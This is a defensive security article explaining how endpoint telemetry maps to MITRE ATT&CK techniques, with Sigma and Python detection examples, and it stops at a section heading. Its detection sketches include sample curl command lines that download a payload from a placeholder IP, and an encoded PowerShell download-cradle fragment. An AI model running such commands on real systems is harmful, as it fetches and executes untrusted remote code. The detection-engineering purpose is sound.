Endpoint Telemetry Is the Evidence Layer Behind Every MITRE ATT&CK Technique

79% of ATT&CK techniques missed by enterprise SIEMs (CardinalOps, June 2025)
1,700+ new Analytics added in ATT&CK v18 (MITRE, October 2025)
13% of existing SIEM rules are non-functional (CardinalOps, June 2025)

Every technique cataloged in the MITRE ATT&CK enterprise matrix produces observable signals at the endpoint. That is not a coincidence or a design aspiration — it is a structural fact about how operating systems work. Understanding why that relationship exists, and how to exploit it operationally, is one of the clearest separators between security programs that detect intrusions early and those that discover them months later.

The MITRE ATT&CK framework, maintained by the nonprofit MITRE Corporation and updated continuously since its public release in 2015, now catalogs 216 techniques and 475 sub-techniques across 14 tactics in the Enterprise matrix as of ATT&CK v18 (released October 2025). Each one of those entries was derived from observed, real-world adversary behavior — not theoretical attack paths. And because real adversaries operate on real operating systems, every one of those techniques generates some form of artifact in endpoint telemetry. That is the connection that makes telemetry not just useful but foundational to a detection program built around ATT&CK.

What Endpoint Telemetry Actually Is

Endpoint telemetry is the continuous stream of behavioral and state-change data produced by operating systems, security agents, and instrumented applications running on individual hosts. It is distinct from network telemetry (which captures packet flows and connections) and log-based telemetry (which captures discrete application events). What makes endpoint telemetry unique is its granularity: it captures what happened inside a process, not just that the process communicated somewhere.

At the operating system level, telemetry sources include process creation events with full command-line arguments, file system operations (reads, writes, renames, deletions), registry modifications on Windows systems, network connections initiated by specific processes, inter-process communication such as named pipe usage and shared memory access, driver and kernel module loads, and authentication events. Modern endpoint detection and response (EDR) platforms go further, adding parent-child process relationship tracking, memory region permissions monitoring, API call tracing, and in-memory code scanning.

On Windows systems, Event Tracing for Windows (ETW) is the underlying kernel mechanism that many of these data streams flow through. Microsoft's own Sysmon — a free system monitor from the Sysinternals suite — exposes a curated set of these ETW channels as structured XML events that feed into SIEM platforms. Sysmon Event ID 1 captures process creation with hash and command-line. Event ID 3 captures network connections. Event ID 10 captures process access — a critical source for detecting credential dumping. Event ID 25, added in Sysmon v13, captures process tampering, which helps detect hollowing and doppelganging techniques that ATT&CK tracks under T1055. As of late 2025, Microsoft has announced that Sysmon functionality will become a native optional feature in Windows 11 and Windows Server 2025, deliverable via Windows Update — removing the manual per-endpoint deployment burden that has historically limited consistent Sysmon coverage across enterprise fleets.
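To make the shape of this telemetry concrete, here is a minimal Python sketch that flattens a Sysmon Event ID 1 record into a field dictionary. The sample XML is trimmed for illustration, not a complete event; the field names (Image, CommandLine, ParentImage) match Sysmon's documented schema, and the namespace is the standard Windows event XML namespace.

```python
import xml.etree.ElementTree as ET

# Namespace used by Windows event XML rendering
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# A trimmed Sysmon Event ID 1 (process creation) record, for illustration only
SAMPLE = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -enc SQBFAFgA</Data>
    <Data Name="ParentImage">C:\\Program Files\\Microsoft Office\\WINWORD.EXE</Data>
  </EventData>
</Event>"""

def parse_sysmon_process_creation(xml_text: str) -> dict:
    """Flatten a Sysmon EID 1 event into a dict keyed by each Data element's Name."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): d.text for d in root.findall(".//e:Data", NS)}
    fields["EventID"] = int(root.findtext(".//e:EventID", namespaces=NS))
    return fields

event = parse_sysmon_process_creation(SAMPLE)
print(event["ParentImage"])  # the parent-child relationship survives into telemetry
```

The point of the exercise is the last line: the parent image travels with the process creation event, which is what makes parent-child detection rules possible downstream.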

Telemetry vs. Logging

Traditional logging captures discrete events when something explicitly writes to a log file. Endpoint telemetry is a broader concept: it includes continuous sensor data from kernel-level hooks, behavioral baselines, and in-memory observations that never produce a log entry on their own. ATT&CK detection requires both, but telemetry coverage is what enables detection of living-off-the-land techniques that deliberately avoid writing log entries.

On Linux and macOS, analogous instrumentation exists through auditd, eBPF-based sensors, and the Endpoint Security Framework introduced in macOS 10.15 Catalina. eBPF (Extended Berkeley Packet Filter) has become particularly significant because it allows security vendors to attach monitoring programs directly to kernel functions without requiring loadable kernel modules — meaning an attacker who avoids creating new kernel modules cannot blind an eBPF-based sensor simply by subverting the module loader.

ATT&CK as a Signal Catalog, Not Just a Technique List

A common misreading of the ATT&CK framework treats it as a threat intelligence reference — a list of things attackers do. That reading is accurate but incomplete. Each technique entry in ATT&CK includes detection guidance that identifies what telemetry sources, data components, and specific data elements defenders should monitor to identify the technique in action. MITRE structured this through a parallel taxonomy called ATT&CK Data Sources, which was formalized and restructured in ATT&CK v10 in October 2021. In the landmark ATT&CK v18 release of October 2025, MITRE went significantly further: traditional Data Sources were deprecated entirely and replaced by two new structured objects — Detection Strategies and Analytics — that transform the framework from a static catalog into a behavior-driven detection model. Detection Strategies define high-level approaches to detecting specific adversary techniques. Analytics provide platform-specific, actionable detection logic with explicit links to log sources and telemetry data components. This means that as of v18, every technique in the Enterprise matrix maps not just to "what log source to collect" but to structured detection logic that specifies exactly how to operationalize that telemetry against adversary behavior.

Signal Path: T1059.001 PowerShell Execution — From Adversary Action to SIEM Alert
Every ATT&CK technique traces an observable path through the operating system.
01 / ADVERSARY: Executes payload. powershell.exe -enc [base64], spawned by winword.exe.
02 / OS ARTIFACT: Kernel event fires. ETW process create event; parent-child relationship preserved.
03 / TELEMETRY: Sysmon captures. Event ID 1: CommandLine, ParentImage, Hashes, User.
04 / LOGGING: Script block logged. Event ID 4104: decoded script content (if Script Block Logging is enabled).
05 / DETECTION: Sigma rule fires. ParentImage matches an Office binary with a PowerShell child.
06 / ALERT: SIEM correlates. Cross-referenced with authentication anomalies and network events.
ATT&CK T1059.001 — Command and Scripting Interpreter: PowerShell
Gap point: if Script Block Logging (step 04) is disabled, the chain breaks — you see execution but not content. If Sysmon is undeployed, step 03 produces nothing.

Prior to v18, the ATT&CK Data Sources taxonomy identified over 30 distinct data source types, each with specific data components. The Process data source included components for Process Creation, Process Termination, Process Access, Process Metadata, and OS API Execution. The File data source included File Creation, File Modification, File Deletion, File Access, and File Metadata. Network Traffic included Network Connection Creation, Network Traffic Content, and Network Traffic Flow. Each technique was mapped to the data source components that produce detectable signals. The v18 overhaul preserves this granularity but links it explicitly to detection logic rather than leaving the implementation gap between "what to collect" and "how to detect" to the organization to bridge independently.

The MITRE ATT&CK Design and Philosophy document (v1.0) states that the framework is not intended to enumerate every possible attacker action. Its purpose is to give defenders an empirically grounded foundation for prioritizing detection and response investments against documented, real-world adversary behavior. — MITRE Corporation, ATT&CK Design and Philosophy, v1.0

This means that when a defender looks up T1059.001 (PowerShell under the Command and Scripting Interpreter technique), they do not just learn that attackers use PowerShell — they find that detection requires monitoring Process Creation events for PowerShell invocations with suspicious arguments, Command execution data from Script Block Logging (Windows Event ID 4104), and Module Load events for suspicious PowerShell module imports. That is a direct prescription for what telemetry sources to configure and ingest. The framework is doing double duty as both a threat catalog and a sensor requirements document.
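As a concrete example of acting on that prescription, the sketch below (Python, illustrative rather than a production parser) recovers script content from a -EncodedCommand invocation captured in process creation telemetry. PowerShell encodes the argument as Base64 over UTF-16LE, so the command line alone can be decoded in the pipeline even before Event ID 4104 content arrives.

```python
import base64
import re

def decode_encoded_command(cmdline: str):
    """Recover script content from a PowerShell -enc/-EncodedCommand argument.

    PowerShell's encoded commands are Base64 over UTF-16LE. Decoding them from
    process creation telemetry exposes content in the pipeline; Event ID 4104
    remains the authoritative source for the full script block.
    """
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")

# Build a sample the way an adversary would encode it:
payload = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()
decoded = decode_encoded_command(f"powershell.exe -enc {payload}")
print(decoded)  # IEX (New-Object Net.WebClient)
```

This is exactly the kind of enrichment an EDR or pipeline stage applies before a SIEM rule ever evaluates the event.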

How Telemetry Maps to Each ATT&CK Tactic

Walking through the 14 ATT&CK Enterprise tactics illustrates how endpoint telemetry provides a signal for each stage of adversary activity. This is not an abstract claim — it holds up under technical scrutiny at each tactic level.

TA0043 / TA0042 | Reconnaissance & Resource Development | HIGH RISK
Key Techniques: T1598, T1588.002
Primary Telemetry: Browser process events, file creation at delivery
Common Config Gap: No endpoint artifact until tool delivery

TA0001 | Initial Access | MEDIUM RISK
Key Techniques: T1566 (Phishing), T1190
Primary Telemetry: Process creation, file creation, registry writes
Common Config Gap: Office parent–child rule not deployed

TA0002 | Execution | MEDIUM RISK
Key Techniques: T1059, T1047, T1053, T1106
Primary Telemetry: Process creation w/ command line (Sysmon EID 1), WMI events (EID 19–21), Script Block Logging (Event ID 4104)
Common Config Gap: Script Block Logging disabled; no command-line argument auditing

TA0003 / TA0004 | Persistence & Privilege Escalation | MEDIUM RISK
Key Techniques: T1547, T1543, T1548
Primary Telemetry: Registry writes (Run keys), Event ID 7045, process integrity levels
Common Config Gap: Registry auditing not forwarded to SIEM

TA0005 | Defense Evasion | HIGH RISK
Key Techniques: T1562.001, T1070.001, T1036, T1055
Primary Telemetry: Process termination, Event ID 1102/104, process metadata, Sysmon EID 25
Common Config Gap: No alerting on log-clear events; no process path baselining

TA0006 | Credential Access | HIGH RISK
Key Techniques: T1003.001 (LSASS), T1558.003 (Kerberoasting)
Primary Telemetry: Sysmon EID 10 (process access), Event ID 4769
Common Config Gap: Sysmon EID 10 not configured; no Kerberos baseline established

TA0008 | Lateral Movement | HIGH RISK
Key Techniques: T1021 (Remote Services), T1550
Primary Telemetry: Network connection creation, file access on destination host, authentication events
Common Config Gap: Server telemetry absent; no cross-host correlation in SIEM

TA0009 / TA0010 | Collection & Exfiltration | MEDIUM RISK
Key Techniques: T1074, T1048, T1567
Primary Telemetry: File creation/modification, network connections w/ process context
Common Config Gap: DLP not correlated with endpoint telemetry; network-only monitoring

TA0040 | Impact | LOWER RISK
Key Techniques: T1486 (Ransomware), T1490, T1561
Primary Telemetry: File modification bursts, VSS deletion commands, disk write events
Common Config Gap: Volume-based anomalies not baselined; detection fires after encryption begins

Reconnaissance and Resource Development

These two pre-intrusion tactics (TA0043 and TA0042) are the hardest to detect from endpoint telemetry alone because they occur before the adversary touches the victim's infrastructure. However, certain sub-techniques do produce endpoint artifacts. T1598 (Phishing for Information) may leave browser process telemetry showing credential submission to lookalike sites. T1588.002 (Obtain Capabilities: Tool) is entirely external, but the subsequent staging of those tools generates File Creation events on victim endpoints at the moment of delivery.

Initial Access

T1566 (Phishing) is the leading initial access technique across threat intelligence reporting. On the endpoint, the signal appears in Process Creation telemetry: a document viewer or browser spawning an unexpected child process is the classic indicator. Microsoft Office spawning cmd.exe or wscript.exe is a pattern that has been exploited so reliably that it appears in detection rules across virtually every EDR platform. File Creation events show the initial payload drop. Registry modification events may show persistence being established in the same execution chain within seconds of the phishing document opening.
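That parent-child pattern reduces to a predicate over two fields of a single process creation event. The sketch below is an illustration in Python; the process name sets are small samples for demonstration, not a vetted production allow/deny list.

```python
import ntpath

# Sample sets for illustration -- production rules carry longer, tuned lists
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def office_spawn_suspect(parent_image: str, child_image: str) -> bool:
    """Document handler spawning a shell/script interpreter: the classic T1566 signal."""
    parent = ntpath.basename(parent_image).lower()
    child = ntpath.basename(child_image).lower()
    return parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN

print(office_spawn_suspect(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                           r"C:\Windows\System32\wscript.exe"))  # True
```

The simplicity is the point: this detection requires nothing more exotic than command-line-enabled process creation telemetry, which is why it appears in virtually every EDR rule set.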

Execution

The Execution tactic (TA0002) is where endpoint telemetry becomes densest. T1059 sub-techniques covering PowerShell, Windows Command Shell, Python, JavaScript, and others all produce Process Creation events. T1047 (Windows Management Instrumentation) produces WMI activity in ETW that Sysmon Event ID 19, 20, and 21 are specifically designed to capture. T1053 (Scheduled Task/Job) produces registry writes and file writes to the %SystemRoot%\System32\Tasks directory. T1106 (Native API) execution produces OS API execution telemetry. The breadth of coverage is extensive, but it requires that the telemetry infrastructure is collecting at the right level of granularity — command-line argument logging must be enabled, and Script Block Logging for PowerShell must be configured.

The PowerShell Logging Gap

By default, Windows does not enable PowerShell Script Block Logging. Without it, a defender sees that powershell.exe ran but cannot see what script it executed. ATT&CK T1059.001 detection depends on this being explicitly enabled via Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell). This is one of the most common telemetry gaps in enterprise environments.

Persistence and Privilege Escalation

T1547 (Boot or Logon Autostart Execution) produces registry modification events in the Run keys and registry writes to HKLM and HKCU. T1543 (Create or Modify System Process) produces service creation events visible through Windows Event ID 7045 and ETW. T1548 (Abuse Elevation Control Mechanism) — covering UAC bypass sub-techniques — produces process creation events with anomalous integrity levels relative to parent process integrity. The parent-child relationship in process creation telemetry is particularly revealing here: a medium-integrity parent spawning a high-integrity child without a visible UAC prompt is a strong indicator of privilege escalation.
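The integrity-level comparison can be sketched as a simple check. This is a hedged illustration: the integrity labels are the standard Windows tiers, but the uac_prompt_seen flag is an assumed correlated signal (derived from consent UI or audit events), not a single native field of the process creation event.

```python
# Windows integrity levels ordered low to high (simplified tiers)
INTEGRITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "System": 3}

def uac_bypass_suspect(parent_integrity: str, child_integrity: str,
                       uac_prompt_seen: bool) -> bool:
    """A child at higher integrity than its parent, with no UAC consent prompt
    observed in the same window, suggests T1548 elevation control abuse."""
    return (INTEGRITY_RANK[child_integrity] > INTEGRITY_RANK[parent_integrity]
            and not uac_prompt_seen)

print(uac_bypass_suspect("Medium", "High", uac_prompt_seen=False))  # True
print(uac_bypass_suspect("Medium", "High", uac_prompt_seen=True))   # False
```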

Defense Evasion

Defense Evasion (TA0005) is the tactic with the largest number of techniques in ATT&CK, reflecting how much adversary effort goes into avoiding detection. Many sub-techniques here specifically target telemetry itself. T1562.001 (Impair Defenses: Disable or Modify Tools) produces process termination events as agents are killed, and registry modification events as security software configuration is altered. T1070.001 (Indicator Removal: Clear Windows Event Logs) produces Security Event ID 1102 (audit log cleared) and System Event ID 104. T1036 (Masquerading) is detected through process metadata telemetry: a process named svchost.exe running from a user's temp directory rather than System32 shows up as an anomaly in file path metadata associated with the process creation event.
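The masquerading check is likewise a metadata comparison. A minimal sketch, assuming standard install locations for the binaries listed (the expected-path table is illustrative, not exhaustive):

```python
import ntpath

# Expected install locations for commonly masqueraded binaries (illustrative)
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
}

def masquerade_suspect(image_path: str) -> bool:
    """Well-known system binary name executing outside its expected directory (T1036)."""
    directory, name = ntpath.split(image_path.lower())
    expected = EXPECTED_DIRS.get(name)
    return expected is not None and directory not in expected

print(masquerade_suspect(r"C:\Users\bob\AppData\Local\Temp\svchost.exe"))  # True
print(masquerade_suspect(r"C:\Windows\System32\svchost.exe"))              # False
```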

Credential Access

T1003 (OS Credential Dumping) is one of the most telemetry-rich technique groups in ATT&CK. LSASS access — the primary signal for T1003.001 — is captured through Sysmon Event ID 10 (Process Access), which logs whenever one process opens a handle to another with specific access rights. A process requesting PROCESS_VM_READ access to lsass.exe is a high-fidelity signal regardless of what tool is used, which is precisely why this detection is considered living-off-the-land resistant. T1558 (Steal or Forge Kerberos Tickets) produces Windows Security Event ID 4769 (Kerberos Service Ticket request) anomalies that are detectable when volume and encryption type baselines are established — RC4-encrypted tickets in an environment configured for AES encryption is a classic Kerberoasting signal.
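The LSASS access check comes down to testing bits in the granted access mask that Sysmon Event ID 10 records. A minimal sketch (the constants are the documented Win32 process access right values; real rules typically also filter known-benign source processes):

```python
# Access right constants from the Win32 process security model
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

def lsass_access_suspect(target_image: str, granted_access: int) -> bool:
    """Sysmon EID 10 logic: a handle to lsass.exe granted VM_READ is a
    high-fidelity T1003.001 signal, independent of the requesting tool."""
    return (target_image.lower().endswith("\\lsass.exe")
            and (granted_access & PROCESS_VM_READ) != 0)

# 0x1010 combines PROCESS_VM_READ with an additional query right
print(lsass_access_suspect(r"C:\Windows\System32\lsass.exe", 0x1010))  # True
print(lsass_access_suspect(r"C:\Windows\System32\lsass.exe", 0x0400))  # False
```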

Lateral Movement, Collection, and Exfiltration

T1021 (Remote Services) lateral movement techniques produce Network Connection Creation events on both source and destination endpoints. SMB-based movement produces file access and process creation telemetry on the destination host. T1074 (Data Staged) produces file creation and file modification events as data is aggregated before exfiltration. T1048 (Exfiltration Over Alternative Protocol) produces network connection events to unusual destinations over unusual ports, correlatable back to specific processes through endpoint telemetry in a way that pure network monitoring cannot achieve.

The Coverage Problem: Why Many Orgs Are Flying Blind

MITRE itself has done significant work to measure the gap between available ATT&CK detection capability and what organizations actually have deployed. The ATT&CK Evaluations program — which tests EDR products against real adversary behavior simulations — consistently reveals both the strength of commercial telemetry tools and the importance of proper configuration. The 2024 ATT&CK Evaluations round (Enterprise 2024) was the most rigorous to date, introducing false positive testing for the first time and expanding platform coverage across Windows, Linux, and macOS. Emulated adversaries included ransomware-as-a-service behaviors modeled on CLOP and LockBit, and DPRK-attributed macOS attack chains. Results showed meaningful variance in technique-level detection and prevention rates across participating vendors, with configuration methodology and out-of-box tuning proving as consequential as platform selection.

Enterprise SIEM Detection Coverage by ATT&CK Tactic
Impact: ~52%
Execution: ~38%
Initial Access: ~34%
Persistence: ~28%
Privilege Escalation: ~24%
Credential Access: ~22%
Lateral Movement: ~18%
Defense Evasion: ~14%
Collection: ~12%
Command & Control: ~10%
Exfiltration: ~9%
Reconnaissance / Resource Development: ~5%
Estimated tactic-level distribution derived from CardinalOps Fifth Annual State of SIEM Detection Risk Report (June 2025) aggregate finding that enterprise SIEMs cover ~21% of ATT&CK techniques overall. Tactic-level figures are proportional estimates based on technique density and reported detection concentrations — not published per-tactic breakdowns. Defense Evasion contains the largest number of Enterprise matrix techniques and consistently shows the lowest coverage density. Overall average: 21%.

CardinalOps' Fifth Annual State of SIEM Detection Risk Report, published in June 2025, is the largest such study conducted to date, drawing on 2.5 million total log sources, more than 23,000 distinct log source types, and more than 13,000 unique detection rules across Splunk, Microsoft Sentinel, IBM QRadar, CrowdStrike LogScale, and Google SecOps. It found that enterprise SIEMs have detection logic for only 21 percent of the ATT&CK techniques used by adversaries, missing 79 percent. The gap was not a data availability problem: those SIEMs were already ingesting sufficient telemetry to potentially cover more than 90 percent of ATT&CK techniques. And approximately 13 percent of existing detection rules were found to be non-functional, unable to fire due to misconfigured data sources or missing log fields.

CardinalOps CEO Michael Mumcuoglu, commenting on the report's central finding, noted that enterprises have spent years accumulating telemetry but still lack the detection engineering to act on it. He argued that without automation, AI-assisted rule maintenance, and continuous detection health assessment, organizations will remain exposed even after deploying modern SIEM platforms. — Michael Mumcuoglu, CEO and Co-Founder, CardinalOps, Fifth Annual State of SIEM Detection Risk Report, June 2025

The coverage gap compounds because many organizations prioritize endpoint telemetry from workstations but underinstrument servers — precisely the systems adversaries target during lateral movement and privilege escalation. Domain controllers are the crown jewels of an Active Directory environment, yet they are often the least monitored endpoints from a behavioral telemetry perspective. T1207 (Rogue Domain Controller / DCShadow), for example, requires monitoring for Directory Service Changes events (Windows Security Event ID 4742 and 5137) on domain controllers specifically. If those events are not being forwarded to the SIEM, the technique is effectively invisible.

Server Telemetry Gap

Security teams that focus endpoint telemetry deployment on workstations and neglect servers are creating a detection gap precisely where adversaries want it. Post-compromise lateral movement, credential access, and data staging overwhelmingly occur on servers. ATT&CK coverage on servers — especially domain controllers, file servers, and database hosts — is not optional for a credible detection program.

EDR, SIEM, and the Telemetry Pipeline

The operational architecture for consuming endpoint telemetry in an ATT&CK-aligned security program involves two distinct systems with different functions. The EDR platform is the collection and initial analysis layer: it ingests raw endpoint telemetry at high volume, correlates events across the process tree, and applies real-time behavioral detections. The SIEM is the correlation and investigation layer: it aggregates telemetry from EDR alongside identity, network, and cloud sources and applies detection logic that spans data sources and time windows beyond what an individual EDR sensor can see.

Neither replaces the other. An EDR platform that detects a credential dumping attempt generates an alert. But determining whether that alert is part of a broader campaign — correlated with anomalous authentication events from the identity provider, lateral movement indicators from network telemetry, and cloud API access anomalies — requires the SIEM to join data across sources. ATT&CK technique coverage is most complete when endpoint telemetry flows from EDR into SIEM in a structured format that preserves process relationship context.

The Sigma rule format, an open-source generic signature language for SIEM systems maintained on GitHub by the SigmaHQ organization, has become a practical standard for expressing ATT&CK-mapped detection logic in a vendor-neutral way. A Sigma rule for T1059.001 PowerShell execution encodes detection logic that can be compiled to query syntax for Splunk, Microsoft Sentinel, Elastic Security, or Chronicle, among others. The SigmaHQ repository currently contains over 3,000 rules, a substantial portion of which are explicitly tagged with ATT&CK technique IDs, making it a practical resource for organizations building ATT&CK-aligned detection coverage.

# Sigma rule excerpt: PowerShell suspicious parent process (T1059.001)
title: Suspicious PowerShell Parent Process
id: 6a5b8b42-ba95-4e2e-a3d9-7db57c2ea98a
status: test
description: Detects PowerShell spawned from suspicious parent processes
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 1
        Image|endswith: '\powershell.exe'
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\outlook.exe'
            - '\mshta.exe'
    condition: selection
falsepositives:
    - Legitimate admin scripting triggered from Office macros
level: high
Sigma rule YAML detecting PowerShell spawned from Office applications, tagged to ATT&CK T1059.001

The practical implementation challenge is data volume. A single active endpoint generating process creation, network connection, file operation, and registry modification telemetry can produce millions of events per day. At enterprise scale, this creates significant ingestion cost and query performance pressure on the SIEM. The trend in the industry has been toward tiered telemetry architectures where EDR handles high-volume raw telemetry with local detections, and only enriched, higher-fidelity events flow into the SIEM for cross-source correlation. Microsoft Sentinel's connector for Microsoft Defender for Endpoint, for example, allows organizations to configure which event types flow upstream — avoiding the cost of forwarding all raw process creation events while preserving the enriched alert context.
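The tiering decision itself is just a routing predicate applied per event at the edge. A minimal sketch, assuming hypothetical category names and an EDR-added verdict field (neither is a real vendor schema):

```python
# Sketch of a tiered pipeline decision: EDR keeps bulk raw telemetry locally,
# and only enriched or high-value events are forwarded to the SIEM.
# Category names and the "verdict" field are illustrative assumptions.
FORWARD_ALWAYS = {"alert", "process_tampering", "credential_access"}

def should_forward(event: dict) -> bool:
    """Forward high-value events upstream; leave bulk raw telemetry at the edge."""
    if event.get("category") in FORWARD_ALWAYS:
        return True
    # Events the EDR has already enriched with a non-benign verdict also go upstream
    return event.get("verdict") not in (None, "benign")

events = [
    {"category": "process_creation", "verdict": "benign"},
    {"category": "process_creation", "verdict": "suspicious"},
    {"category": "alert"},
]
print([should_forward(e) for e in events])  # [False, True, True]
```

The design trade-off is explicit: the first event never reaches the SIEM, which saves ingestion cost but also means cross-source correlation can only see what the edge chose to forward.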

Closing the Coverage Gap: Solutions That Go Beyond the Basics

Recommending that organizations "deploy EDR" and "enable Script Block Logging" is accurate but operationally insufficient. The CardinalOps finding — that enterprise SIEMs already ingest telemetry sufficient to cover more than 90 percent of ATT&CK techniques, yet cover only 21 percent in practice — is a diagnosis of an engineering and process failure, not an infrastructure one. The solutions that actually close the gap are harder and more specific than the generic advice that dominates most coverage of this problem.

Detection-as-Code with Continuous Validation Pipelines

The 13 percent non-functional rule finding from CardinalOps points to a maintenance failure that manual processes cannot fix at scale. Detection logic that was valid at deployment becomes broken when log source schemas change, when data normalization pipelines are updated, or when source systems shift versions. The solution is to treat detection rules as code — managed in version-controlled repositories (Git), validated against test data in CI/CD pipelines before deployment, and continuously tested in production through synthetic telemetry injection. Atomic Red Team, the open-source test framework maintained by Red Canary and mapped explicitly to ATT&CK techniques, provides a library of portable test procedures that simulate technique-specific telemetry without requiring an active adversary. Running Atomic Red Team tests against production telemetry pipelines on a scheduled basis produces a live measurement of which ATT&CK techniques your current rules actually detect — not which ones you have rules for on paper. That distinction is what the 13 percent non-functional rate reflects: rules that exist but cannot fire. A detection engineering program without synthetic test coverage cannot distinguish between the two states.
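The difference between "rules that exist" and "rules that fire" can be demonstrated in a few lines. The sketch below is in the spirit of CI-validated detection-as-code; the rule predicate and synthetic events are illustrative and do not follow Atomic Red Team's actual test format.

```python
# A minimal detection-health check: a rule is only healthy if it fires
# against a synthetic true-positive event injected into the pipeline.

def rule_t1070_001(event: dict) -> bool:
    """Fires on Windows Security Event ID 1102 (audit log cleared)."""
    return event.get("channel") == "Security" and event.get("event_id") == 1102

def validate_rule(rule, synthetic_events) -> bool:
    """Healthy only if the rule fires on at least one synthetic true positive."""
    return any(rule(e) for e in synthetic_events)

synthetic = [{"channel": "Security", "event_id": 1102, "user": "testlab"}]
assert validate_rule(rule_t1070_001, synthetic)

# Upstream schema drift (a field renamed by the pipeline) silently breaks the rule:
drifted = [{"channel": "Security", "EventID": 1102}]
print(validate_rule(rule_t1070_001, drifted))  # False -- the "non-functional rule" state
```

Run on a schedule, this kind of check surfaces the non-functional state the moment a schema changes, rather than months later during an incident.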

Telemetry Normalization at the Pipeline Layer, Not the Query Layer

Organizations running heterogeneous endpoint environments — Windows EDR alongside Linux eBPF sensors alongside macOS Endpoint Security Framework events — face a common problem: the same ATT&CK technique generates structurally different telemetry across platforms. When normalization is deferred to query time, each detection rule must implement platform-specific field mappings manually, multiplying rule maintenance burden and creating platform-specific blind spots. The OCSF (Open Cybersecurity Schema Framework), an industry initiative driven by AWS and a consortium of security vendors and now an open standard, provides a vendor-neutral event schema designed to normalize endpoint, network, and identity telemetry into a common field structure before it reaches the SIEM query layer. Deploying OCSF normalization at the data pipeline layer — rather than building per-platform logic into individual Sigma rules — means a single ATT&CK-aligned detection can fire against Windows, Linux, and macOS process creation events without per-platform variants. The operational difference is the distinction between detection engineering that scales and detection engineering that collapses under the weight of its own platform exceptions.
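The payoff of pipeline-layer normalization is that one detection fires across platforms. A sketch under stated assumptions: the field names below are simplified stand-ins for a common schema, not the actual OCSF class definitions.

```python
# Normalizing heterogeneous process telemetry into one shared shape before the
# query layer. Field names are simplified stand-ins, not the real OCSF schema.
import ntpath

def normalize_windows(ev: dict) -> dict:
    return {"activity": "process_launch",
            "process_name": ntpath.basename(ev["Image"]).lower(),
            "cmdline": ev.get("CommandLine", ""),
            "host": ev["Computer"]}

def normalize_linux_ebpf(ev: dict) -> dict:
    return {"activity": "process_launch",
            "process_name": ev["comm"],
            "cmdline": " ".join(ev.get("argv", [])),
            "host": ev["hostname"]}

def detect_remote_download(norm: dict) -> bool:
    """One rule, written once against the normalized shape, fires on both platforms."""
    return norm["activity"] == "process_launch" and "curl" in norm["cmdline"]

win = normalize_windows({"Image": r"C:\Windows\System32\curl.exe",
                         "CommandLine": "curl http://203.0.113.9/payload -o p.exe",
                         "Computer": "ws01"})
nix = normalize_linux_ebpf({"comm": "bash",
                            "argv": ["bash", "-c", "curl http://203.0.113.9/payload"],
                            "hostname": "web01"})
print(detect_remote_download(win), detect_remote_download(nix))  # True True
```

Without the normalization layer, detect_remote_download would need per-platform field mappings in every rule that touches process events.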

ATT&CK Coverage Gap Analysis as a Prioritization Instrument

Most organizations that do perform ATT&CK coverage gap analysis produce a spreadsheet: technique X has coverage, technique Y does not. That analysis is a starting point, not a prioritization framework. Coverage gaps vary enormously in operational consequence depending on which adversary groups target your sector, which techniques appear in your threat intelligence, and which techniques appear in multi-stage kill chains where a single gap voids coverage upstream and downstream. A more defensible prioritization approach combines ATT&CK coverage gap data with threat intelligence profile weighting. The MITRE ATT&CK Navigator, the free web-based layer customization tool, supports this directly: organizations can load threat actor profiles from MITRE ATT&CK (such as APT29, APT41, or Lazarus Group profiles), overlay them against their current detection coverage layer, and identify the specific techniques used by adversaries relevant to their sector that they are not currently detecting. The resulting gap list is materially shorter and operationally more relevant than a list of every undetected ATT&CK technique. Prioritizing closure of those gaps — rather than chasing overall coverage percentage — is what differentiates a detection program designed around real adversary behavior from one designed around a scorecard.
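The set arithmetic behind that prioritization is simple enough to sketch directly. The technique sets below are small illustrative samples, not real Navigator layers or complete actor profiles:

```python
# Intersecting coverage gaps with a threat-actor profile to get the short,
# operationally relevant gap list. All technique sets are illustrative samples.
tracked_techniques = {"T1059.001", "T1566", "T1486", "T1003.001", "T1055",
                      "T1021.002", "T1070.001", "T1048", "T1074"}
current_coverage = {"T1059.001", "T1566", "T1486"}
actor_profile = {"T1059.001", "T1003.001", "T1055", "T1021.002", "T1070.001"}

gaps = tracked_techniques - current_coverage
prioritized = sorted(gaps & actor_profile)
print(prioritized)  # ['T1003.001', 'T1021.002', 'T1055', 'T1070.001']
```

Six uncovered techniques collapse to four that the modeled adversary actually uses; closing those first is the scorecard-versus-adversary distinction in miniature.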

Detection Resilience Engineering Against Active Evasion

